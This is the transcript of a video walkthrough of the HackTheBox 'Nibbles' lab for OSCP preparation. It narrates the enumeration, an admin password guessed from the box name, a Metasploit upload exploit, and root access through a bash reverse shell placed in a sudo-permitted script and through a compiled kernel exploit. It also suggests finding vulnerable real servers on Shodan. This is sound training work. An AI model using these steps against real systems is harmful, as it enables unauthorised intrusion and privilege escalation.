Hey guys, HackerSploit here, back again with another video. Welcome back to the OSCP prep series. In this video, we're going to be taking a look at nibbles on HackTheBox. So this is one of these boxes that are, actually quite fun and useful in regards to preparing for your OSCP certification. So it's a Linux box, and I'm going to be exploring the process of, gaining initial access and of course performing privilege escalation. The objective being to obtain root access so you can essentially obtain all the flags. That being said, it's a fairly simple box, but I think it has quite a few interesting techniques that I wanted to highlight. And I'll be showing you how to use various tools and scripts to perform enumeration, right? So before I actually get started with that, I just want to update you on the current situation regarding the video releases and the schedule that I've actually worked on. So you can expect to have at least 3 videos per week. So of course they'll range from from various topics, from penetration testing, red teaming, web application penetration testing. We're working a lot of bug bounty content and red team content, so you can expect a lot of that in the coming months. And we finally have everything ready to go. We've worked on a lot of series in the background that we're going to be releasing, so really excited for that. That being said, let's get started. So the first thing we want to do is of course take a look at the Nmap scan, which I've already performed ahead of time. And again, the results will be fairly simple. You can take a look at my Nmap scan options here. Essentially performed a SYN scan and used the advanced option here. The timing template was T4, and I scanned all TCP ports, right? And essentially outputted there. The IP is going to be different because I performed this scan previously. As for the services that are running on the target, you can see it's fairly simple. So you have SSH running OpenSSH 7.2p2 on the default port, which is 22. We also have a web server running on port 80, so that's running Apache HTTPD 2.4.18. So if we access the web server here, you can see it simply tells us hello world. If we view the source of the page, you can see there's nothing. However, at the end here, we can see an HTML comment saying nibble blog directory, nothing interesting here. All right, so given the fact that this is a CTF style, we can essentially access it. So we'll say nibble blog, we hit enter, and it takes us directly to what looks or what appears to be a content management system called nibble blog, as you can see right over here at the bottom, powered by nibble blog. So I'm just going to perform some directory brute forcing. In this video, let's try and use dirbuster so I can actually show you various options associated with this tool, because I've been using GoBuster quite a bit, and I don't want to depend on a single tool. So I'll set it to 100 threads. For the word list that we're going to be using, let's try and use user share word lists, and I will use dirbuster, and we'll use directory list lowercase 2.3 medium.txt. You can use whatever's comfortable for you. Now for the brute forcing options, we want it to be recursive, so we want to brute force subdirectories as well. We don't want to perform any fuzzing at the moment because we don't know what we're dealing with per se. We know it's running Apache, that's as far as we know. We also know it's running nibble blog, which we'll actually perform research on in a second. But we'll also enable brute force directories and brute force files so that we can actually brute force different files there. Now, as per the brute force files options, we can specify extensions. So when we're dealing with a content management system, we can specify other extensions. So for example, PHP, HTML, XML, TXT, and again, based on the web server stack that's running on the target, you can then modify the extension. So for example, if the target was running a Microsoft web server, IIS web server, then of course you can change it to ASP and other types of extensions associated with the web server technology involved. In this case, we pretty much can tell that it's running Apache and of course PHP, consequently PHP. So we can just hit start now, and we're going to wait for this to enumerate all the results. In the meantime, we can perform some vulnerability analysis on the content management system, and we'll do that using SearchSploit. So I'll just zoom in here, and we'll say SearchSploit, and we'll just search for nibble. Right, and we can see we have 2 vulnerabilities for nibble blog, so it looks like a content management system. So this one right over here, let me just drag this to the side for a second, and let me just run that one more time. We can see For NibbleBlog version 3, we have multiple SQL injection vulnerabilities, and NibbleBlog 4.0.3. That's essentially an arbitrary file upload module for Metasploit. We'll get to these in a second. However, if we take a look at the directory brute forcing here, you can see we have the admin.php page. So let's try and access that now. So I'm going to say admin.php, and that essentially allows us to log into the content management system. Let's take a look at a few other directories there. What I'll do is let me just duplicate this tab here, and let's see what else we're able to identify. We get the feed. We also get NibbleBlog content private. So that's a directory under content and private, right? So if we access that directory, it looks like we have directory listing enabled, and we get XML files here. So we have various configurations. So we have the config.xml file, which essentially gives us the email here that I think we can utilize. So let me just copy this down here. And right, so let me copy that here. I'm just going to open up Mousepad and I'll paste that in there. Let's take a look at the other files. We also have keys.php, which doesn't display anything, obviously. We also have plugins, posts, shadow.php, tags, and users. All right, so we have users.xml. So we can see we have a username admin here, so we can try and log in with that, but we don't have a password because we essentially have this appears to be just a configuration file that contains the username, the IP, the date, and the fail count, right? Or, you know, essentially the parameters associated with the login options for that particular user. So I'll just paste that in there. So we have the username and we have the email, right? So we can actually try and log in with this. So I'm just going to say admin, and we don't have a password, but we can try and guess. So the name of this box is Nibbles. So I'll try Nibbles and I'll hit login there. And it looks like that worked. So again, we have access to the content management system, and we can take a look at the settings here as per, you know, whether or not we can use this for initial access. But if you remember correctly, we have a Metasploit module that allows us to perform arbitrary file uploads. However, we need to verify that it's running version 4.0.3. Let's see if we can actually identify the version here. Let's head over to the dashboard. We can't see any version enumeration here. So again, if we head over into plugins, let's see what plugins we have here. So these are simple plugins that essentially extend functionality here for this content management system, similar to very similar to WordPress. Right, but we still aren't able to identify the version. Actually, we do. There we are. So NibbleBlog 4.0.3. So we know that that works. So let's actually try and load up this module. So I'm just going to say MSF console, and we'll then search for Nibble or NibbleBlog, as it were. And let's see whether we can find that particular module. So I'm going to say search, and we'll say NibbleBlog, and we have it right over here, arbitrary file upload. So we'll copy that and we'll say use, paste that in there. Let me just reduce the font size here so that we have a better spacing and organization. So the default payload is PHP interpreter reverse TCP. That's perfectly fine. If we show the options for this module, we can see that we need to provide the password for the admin panel as well as the username. We already have that. We're able to guess that. The R port, the R hosts, as well as the target URI, which is NibbleBlog. So we can start setting those options. The first thing I want to do, however, is just get my my IP address. This is going to be my the IP address of the tunnel interface, which is the HackTheBox VPN IP, because this is being performed on a you know, we're actually interacting with the target via VPN. So we're going to say set lhost, and I'll paste the IP there. We'll leave the L port as it is. That's perfectly fine. The password we know was Nibbles. Sorry. And we then had the rhosts option, which we will just set here. So I'm just going to copy the IP. So we'll just head over there and let's copy the IP and paste that in there. The rport option is fine. We want to set the target URI. Target URI is going to be NibbleBlog. Yep, that's correct. And then the username is going to be admin, right? In lowercase as well. All right, so if we show the options now, everything looks like it's set correctly, and we can just hit run. Let's see whether we get a interpreter session on the target system. So there we are. It looks like it's sending the stage, and it deletes the image that contains the payload, or the stage rather, and we get an interpreter session. So I'm just going to give that a few seconds to open up here. And again, let me just reduce the font size here. Right, so let's see whether we're able to get it. There we are. We get an interpreter session. So sysinfo. We can see it's a Linux box, obviously, and it looks like it's running Ubuntu, and we're currently, the name of the computer is Nibbles, get user ID. We're currently the user nibbler. All right, so I'm going to open up a shell session here, and I'll just spawn a bash session. So bin bash I. So we don't have any job control. That's fine. Let me head over to the home directory, list out the contents here. Looks like we have the user flag, which again, I've already completed this box in the past. So again, I'll just cat it out one time here. So there we are. We get the user flag. We also have a personal.zip file here, or zip archive. And that's pretty much it. So let's perform some system information, right? So the first thing I'm going to do is let's get out the kernel information. So the kernel is 4.4.0. 104 generic. If we cat out the distribution information here, so cat etc release, we can see it's running Ubuntu 16.04.3 LTS, and you know, we can pretty much, our objective now will be to again obtain root access. So you can see permission denied. Let's try and enumerate the users on the system. So cat etc password. We can see we have the nibbler user, and that's pretty much it in regards to user accounts. The rest are going to be service, or the rest are all service accounts for SSH, MySQL, etc. Right, and yeah, we pretty much don't have any other user apart from the root user, which we'll try and utilize. So we can start performing enumeration in regards to identifying vulnerabilities, you know, by leveraging various automation scripts or automated enumeration scripts like linpeas or linenum or the Linux exploit suggester. So what we're going to do is let's head over into the temp directory here, and I will use the, let me head over to my desktop and Linux enum, and let's use the linenum script here. So I'm just going to again say sudo python m simple HTTP server, and we'll host that on port 80 so that we can transfer the script over to the target. Paste in my password there. And by the way, I also want to, I need my IP address here because we'll need to actually transfer it with wget. So again, there's my VPN IP there. So I'll say wget HTTP and we'll transfer it. So my IP is 10.10.14.139, and with the script we want to download is linenum.sh. And by the way, you can actually get more information regarding this script. Let me just open this up. So linenum, let me open that up in Google, and this is the script here. But if you are interested, this is going to be in the description section. So it's an enumeration script for Linux. So again, it essentially allows you to perform privilege escalation checks on the target system. So I'm just going to download the script. There we are. And again, I'm going to give it executable permissions. So linenum.sh, right? And we can now execute it. So linenum.sh. And this will give us an overview of all the relevant information pertinent to elevating our privileges on the target system. Right, so let's head over to the top here because it displays the kernel information and the distribution release information, as well as the current user, other users that have logged on to the system, which is very useful in some cases. Who else is logged on using overt authentication protocols like SSH? Remember, we have access on the target through a payload, right? So we are not actually authenticated to the target. We can probably try and utilize the the credentials we retrieved and log in via SSH, but in this case we don't need to do that. If we take a look at all the other information here, we can see that under the option here, it says we can sudo without supplying a password. So again, we're able to identify scripts or binaries that we can execute without providing a password as the root user, right? So I've already explained this vulnerability before, and in this case, it looks like we can execute the script called monitor.sh under the home directory, and it's called, again, this is under the Nibbler user, which we have access to, so we can actually do this. I'm not sure whether this script exists because the personal file that we found was a zip archive, so we probably can unzip it or create our own. And then we can create our own monitor.sh script and then execute it, and that will perform whatever we want it to do. And of course, it's going to perform or run the script with root privileges. You can see right over here, possible sudo ponage, and it provides us with the directory or the actual script that we can execute without providing a password, right? And we don't have any other, we weren't able to detect any other vulnerabilities. If we take a look at the cron tab, we don't have any cron jobs there, as well as the systemd timers. For the processes, again, we pretty much have the standard processes associated with a LAMP stack. All right, so we can try and exploit that. Before I do that, however, let me just copy the actual directory and name of the script here, and I'll just paste it in mousepad just so we can have it as a reference. And there we are. Looks like the scan is completed. So if we head over to our home directory for the user Nibbler, you can see we have the personal.zip archive here. So if we unzip it, we can see personal.zip. Right, so it actually creates the scripts for us. So it, essentially unzips that particular directory. So personal, cd personal, and stuff, and cat monitor.sh. So it looks like it already does stuff. What we can do ideally is modify this and make it execute our own malicious commands or arbitrary commands that can provide us with a reverse shell with root privileges. So I'm just going to remove this script here, because again, I don't want to do, I'm not going to be using the functionality within it. So what I'll do on my Kali VM here is let me just exit, and I'll just head back into documents, HackTheBox, boxes, and nibbles. And within this, we'll create the script here, and then we'll transfer it over to the target. So monitor.sh. And again, because this is a bash script, we're going to say bin bash. And then I'm going to search for the bash reverse shell, and we'll utilize TCP. So again, payloads all the things. This is a great reference, and we'll go to bash TCP, and we'll use the first option here, right? And again, we'll just add that. So I'll head back over into my terminal. Paste that in there. We now need to get our IP address, right? So again, let me just make sure I have that copied. It's there we are. So 10.10.14.139. So 10.10.14.139, and the port that we want to connect back to, or we want this script to connect back to, is 1234, and that should work. I'm just going to provide it with executable permissions. chmod +x monitor.sh. And we can now transfer it. So I'm just going to close this, and we can then serve this particular directory. By the way, the terminal alias right over here called serve is just my own alias that I created that essentially, again, will start up the simple HTTP server module, and will host, will actually host the files within this particular directory. Right, so there we are, and we can now transfer it over to the target in this particular directory, and we'll just say wget http 10.10.14.139 monitor.sh. We get the script here. Again, I'm just going to make sure it has executable permissions, monitor.sh, and now we can set up our listener. So I'm just going to terminate that there, and we'll say netcat nvlp1234, and then we can now execute the script. So the way we need to execute it when we're talking about scripts or binaries with the no password flag set, we need to execute it with the absolute path. So we say home nibbler personal stuff monitor.sh, and we hit enter. And we get a connection back on our listener here, and you can see we have root access. So we can head over into the root directory, and there we are, we have the root flag, so cat root.txt, and we get the root flag there. All right, so we've been able to elevate our privileges successfully. However, we can also explore other privilege escalation vectors. So for example, we could try and identify whether this particular target is vulnerable to a kernel exploit. And again, what I'll do is I'll terminate my privilege session here. There we are, we're back onto Kali. And on the target, I'm just going to head back over into the temp directory, so tmp, and we are going to copy over the Linux exploit suggester script. However, before we do that, let's try and identify whether we can find any vulnerabilities with searchsploit or an exploit DB. So let me just get out the kernel version, because we are targeting the kernel. So it's 4.4.0. So searchsploit 4.4, actually let me say Linux 4.4.0 and 104. Right, we hit enter. Let's see whether we can find any kernel exploits, with searchsploit. So right over here, we can see we have 4.4.0116. That's the closest match, right? And we can try it out. Again, let me just expand this here so we can actually see what this particular exploit does. I'm just going to search for it there. We can also try and search for this particular exploit on the web, but if we have the code available here, we can try and use it, right? So 4.4.0116, this is local privilege escalation, and the actual script is provided there. So we can actually try and utilize it. It should work if the variant is, or the kernel version is the same, regardless of the variant, and the version of Ubuntu is the same, although in our case, the version of Ubuntu that's running on the target is 16.04.3. But we can still try. Let's see whether it'll actually work. So I'm just going to copy this exploit code, and we'll say copy user share exploit db exploits, paste in the actual directory there, and I'll copy to my current directory. So we have the script there, the C code, sorry, or the C file. So let's try and see, let's open it up and let's see how this works. All right, so it's been tested on that version of Ubuntu. And again, what we can do, it looks like, again, it has a payload there. And again, we can't really deduce what it's doing just by looking at the script, because there isn't any documentation provided along with it. So what I'll do is I'll just search. So I'll use the web search plugin. This is a ZSH plugin. So we can search Linux 4.4.0. And of course, we can try and utilize the same version here. So again, that's going to be 104 exploit. Let's see whether that provides us with anything. There we are. We have the exploit DB code there. And it's pretty much just going to give us what we already have, right? But no instructions as to how we can execute it, right? Let's see, this is the double, well, actually this version is not for our particular version of Ubuntu. But right over here, again, these ones are not the same ones here for the version, the kernel version running on our target. And yeah, I don't think we can actually get quite a bit of information regarding this particular exploit, although it looks like we have a vulnerability report here. But it still doesn't give us an idea of what's going on, right? As how to use this, but we can try and improvise around it. Now, as I've said before, you never want to run kernel exploits on a target that you haven't tested before, right? So ideally, if you're working in a real environment, running a kernel exploit can cause a kernel panic, or, can actually cause the system to crash. And this applies for both Windows and Linux systems. So again, you have to be very careful with this. And ideally, I don't really want to do this, but we can try compiling it with GCC just to see whether we can actually compile it simply without providing any compilation options. It looks like it compiles successfully. So again, I'm just going to provide it with executable permissions, exploit, and then we can again serve the files within this directory and transfer it over to the target. So I'll do that right now, 10, 10, 14, 139, and it's just called exploit. And we're able to get it successfully if we run it. Right, so chmod plus x exploit, there we are. And then we run exploit here. It looks like it's run. If we type in ID, we have root access. And if I now say, let's get a bash session here, and we've got root access via kernel exploit. So again, I don't think this is a, this was actually one of the privilege escalation vectors that you could use or that you can use, although as I've just demonstrated, there's multiple ways of gaining access or, elevating privileges on a target system. And, this is fairly applicable because there are still Ubuntu servers running, Ubuntu 16.04 servers running on the internet. And you can actually test this by searching on Shodan for Ubuntu 16.04 servers. Probably versions of Ubuntu that meet the parameters to run this particular exploit. And you can actually elevate your privileges using this particular technique. And of course, the reason why I showed you this is because again, when you're dealing with CTF boxes and you have CTF based privilege escalation vectors like the no password options configured for a particular script or binary, that is something that you'll find in some cases, but in most cases, if the Linux server has been set up by an experienced system administrator, you'll never find that particular script is in a directory that any other user apart from the root user can actually access. So again, you should what I'm trying to pass along here is you should be comfortable exploring various privilege escalation vectors on Linux, and I'll be exploring additional ones in the future like SUID binaries and a few others that target cron jobs, so on and so forth. So that's pretty much it for this video. It's a very interesting box. As I said, it relies heavily on enumeration, especially to gain your initial foothold on the target system. But whenever you're dealing with a content management system, it's going to be fairly simple if there if a vulnerability exists for that content management system. That being said, that's going to be it for this video. Let me know what you guys think in the comments. If you have any questions or suggestions, leave them in the comment section. You can also contact me on Twitter. If you liked this video or found value in it, please leave a like down below, and I'll be seeing you in the next video. A huge thank you to all of our Patreons. Your support is greatly appreciated, and this is a formal thank you. So thank you Shamir Douglas, Ryan Carr, Sandor, Michael Busby, Sid Saab, Doozy, Tafim Bari, Dustin Umpress, and Michael Hubbard. Your support is greatly appreciated, and you keep us making even more high quality content for you guys. So thank you.